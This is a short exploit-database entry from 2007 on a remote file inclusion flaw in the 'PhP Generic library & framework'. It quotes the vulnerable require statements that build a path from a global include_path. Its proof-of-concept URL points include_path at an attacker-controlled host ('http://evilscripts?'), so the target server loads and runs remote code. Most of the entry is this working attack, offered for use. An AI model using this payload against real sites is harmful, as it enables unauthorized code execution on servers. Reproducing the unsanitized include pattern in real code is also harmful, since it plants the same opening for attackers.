id: 1440
date: 01/28/2007
title: PhP Generic library & framework (include_path) RFI Vulnerability
author: xoron
cves: 

================================================================
PhP Generic library & framework (include_path) RFI Vulnerability
================================================================



-----------------------------------------------

PhP Generic library & framework (include_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:

require $GLOBALS[include_path]."configmember.php";
require $GLOBALS[include_path]."inc-membreManager.php";

-----------------------------------------------

POC:

www.[target].com/[script_pat]/membres/membreManager.php?include_path=http://evilscripts?


-----------------------------------------------




#  0day.today [2023-03-22]  #